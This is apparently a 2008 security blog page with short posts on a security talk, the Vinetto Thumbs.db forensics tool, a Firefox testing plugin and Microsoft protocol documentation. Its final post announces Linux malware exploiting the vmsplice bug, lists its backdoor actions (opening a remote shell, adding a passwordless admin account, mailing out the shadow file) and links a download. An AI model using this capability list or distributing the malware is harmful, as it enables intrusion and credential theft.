Segue abaixo um link para uma apresentação que usei em uma palestra na escola Coopam aqui de Orlândia. Esta palestra foi ministrada para os universitários dos cursos de Sistemas de Informação e Administração de Empresas. Falei sobre tópicos básicos do assunto, técnicas de ataques e mecanismos de defesa.
Link:
http://rapidshare.com/files/121181348/seguranca.pdf.html
Monday, June 09, 2008
Thursday, April 10, 2008
Examining thumbs.db files with Vinetto
Vinetto is a forensics tool to examine Thumbs.db files.
It is a command line python script that works on Linux, Mac OS X and Cygwin(win32).
The Windows systems (98, ME, 2000, XP and 2003 Server) can store thumbnails and metadata of the picture files contained in the directories of its FAT32 or NTFS filesystems.
The thumbnails and associated metadata are stored in Thumbs.db files.
The Thumbs.db files are undocumented OLE structured files.
Once a picture file has been deleted from the filesystem, the related thumbnail and associated metada remain stored in the Thumbs.db file. So, the data contained in those thumbs.db files are an helpful source of information for the forensics investigator.Vinetto extracts the thumbnails and associated metadata from the Thumbs.db files...
Link: http://vinetto.sourceforge.net/
It is a command line python script that works on Linux, Mac OS X and Cygwin(win32).
The Windows systems (98, ME, 2000, XP and 2003 Server) can store thumbnails and metadata of the picture files contained in the directories of its FAT32 or NTFS filesystems.
The thumbnails and associated metadata are stored in Thumbs.db files.
The Thumbs.db files are undocumented OLE structured files.
Once a picture file has been deleted from the filesystem, the related thumbnail and associated metada remain stored in the Thumbs.db file. So, the data contained in those thumbs.db files are an helpful source of information for the forensics investigator.Vinetto extracts the thumbnails and associated metadata from the Thumbs.db files...
Link: http://vinetto.sourceforge.net/
Friday, March 28, 2008
Thursday, March 27, 2008
Firefox Web Application Testing Tools
Lightweight and portable is always a benefit for web application exploitation tools. Take a look at this open-source plugin for Firefox and see how it fares against today's web applications.
Link:
Darknet.org
Link:
Darknet.org
Tuesday, March 25, 2008
Monday, February 25, 2008
Microsoft started a Protocols Program
Microsoft has started a Protocols Program. This project includes thousands of pages of documentation (in .pdf format) divided into categories like Microsoft Communications Protocol Program (MCPP, for "server software that interoperates with Windows desktop operating systems") and Microsoft [Work Group] Server Protocol Program (WSPP, for "server software that interoperates with Microsoft Windows server and desktop operating systems to provide file, print, and user and group administration services"). I am frankly astounded by the number of documents available. Windows_Communication_Protocols.zip and Windows_Server_Protocols.zip are 314 MB total. Documentation like this is a boon for those who develop protocol analyzers, network security inspection systems, and filtering products. Security analysts and reverse engineers will also like to read this material.
Tuesday, February 19, 2008
SARA Linux Malware
Hi all!
I released today a basic malware for to exploit the vmsplice bug on Linux kernel.
This program use the vulnerability for install some backdoors on system.
UPDATED
Actions:
- disable INPUT rules on firewall
- open the 1407 port for execute remote commands
- open a bash session on 14071 port using the xinetd daemon
- add a admin user without password
- schedule malicious tasks on cron
- mail the shadow file for a mail account
Vulnerables systems: Linux 2.6.17 - 2.6.24.1
Warning:
THIS IS A MALWARE. DON'T RUN IT IF YOU DON'T KNOW
WHAT YOU ARE DOING.
Download:
http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz
I released today a basic malware for to exploit the vmsplice bug on Linux kernel.
This program use the vulnerability for install some backdoors on system.
UPDATED
Actions:
- disable INPUT rules on firewall
- open the 1407 port for execute remote commands
- open a bash session on 14071 port using the xinetd daemon
- add a admin user without password
- schedule malicious tasks on cron
- mail the shadow file for a mail account
Vulnerables systems: Linux 2.6.17 - 2.6.24.1
Warning:
THIS IS A MALWARE. DON'T RUN IT IF YOU DON'T KNOW
WHAT YOU ARE DOING.
Download:
http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz
Subscribe to:
Posts (Atom)